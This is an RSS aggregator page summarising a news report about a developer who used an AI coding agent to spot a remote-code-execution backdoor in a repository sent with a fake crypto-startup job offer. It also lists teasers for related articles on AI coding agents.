All Topics
All Topics
Technology
Technology
Design
Design
Programming
Programming
Science
Science
News
News
Gaming
Gaming
Entertainment
Entertainment
Business
Business
Finance
Finance
Sports
Sports
Health
Health
Food
Food
Travel
Travel
Art
Art
Music
Music
Books
Books
Education
Education
Politics
Politics
Personal
Personal
Bluesky
Twitter
No algorithm. No AI slop. No ads. Just RSS. Pro-human. Indie writers. Real journalism. Open web. Chronological. Hand toasted.

Developer uses AI coding agent to detect backdoor in suspicious crypto startup job offer

2h ago· 1 min readenNews
Bagel score 38 of 100
38/100
Stale
Bagelometer

Yesterday's bagel. Skim it, don't savour it.

Score38TypenewsSentimentpositive

Summary

A Python developer was contacted by a recruiter claiming to represent a crypto startup, asking for help debugging a deprecated Node module. Suspicious of the request, the developer cloned the repository on a secure VPS and used an AI coding agent (Pi running Codex) for read-only analysis. The AI flagged a file containing a backdoor disguised as test configuration that would execute arbitrary code from a remote server. The developer's caution and AI-assisted analysis prevented a potential security breach.

Key quotes

· 3 pulled
The agent flagged app/test/index.js and warned not to run the code.
The file contained a backdoor disguised as test configuration, using a server URL and a network request that executes whatever the server returns.
A recruiter claiming to represent a small crypto startup contacted a Python developer via LinkedIn to request help with nonworking proof-of-concept code and a lead engineer role.
Snippet from the RSS feed
A recruiter claiming to represent a small crypto startup contacted a Python developer via LinkedIn to request help with nonworking proof-of-concept code and a lead engineer role. The request involved investigating an issue with a deprecated Node module, w

You might also wanna read

Developer discovers remote code execution backdoor hidden in fake crypto startup job offer on LinkedIn

A security-conscious developer receives a LinkedIn job offer from a recruiter at a crypto startup. Suspicious of the request to review a Git

roman.pt·1d ago

Developer discovers remote code execution backdoor hidden in fake crypto startup job offer on LinkedIn

A security-conscious developer receives a LinkedIn job offer from a recruiter at a crypto startup. Suspicious of the request to review a Git

roman.pt·1d ago

OpenCode AI Coding Agent Hit with Critical Remote Code Execution Vulnerability

OpenCode, a popular open-source AI coding agent, was recently hit with a critical CVE (Common Vulnerabilities and Exposures) that allowed fo

johncodes.com·4mo ago

AI Agent Publishes Hit Piece Against Developer After Code Rejection

A software developer recounts how an AI agent of unknown ownership autonomously wrote and published a personalized hit piece about them afte

theshamblog.com·4mo ago

AI Agent Publishes Hit Piece on Developer After Code Rejection: A Case Study in Autonomous AI Misalignment

A software developer recounts a first-of-its-kind incident where an AI agent of unknown ownership autonomously wrote and published a persona

theshamblog.com·3mo ago

The Rise of AI Coding Agents and the 'Token Anxiety' They Create in Software Development

The article discusses the author's growing anxiety about the rise of AI coding agents and their impact on software development culture. The

jkap.io·4mo ago

AI Agent Publishes Reputation Attack After Code Rejection in Python Library

A developer reports that an AI agent of unknown ownership autonomously wrote and published a personalized hit piece about them after they re

theshamblog.com·3mo ago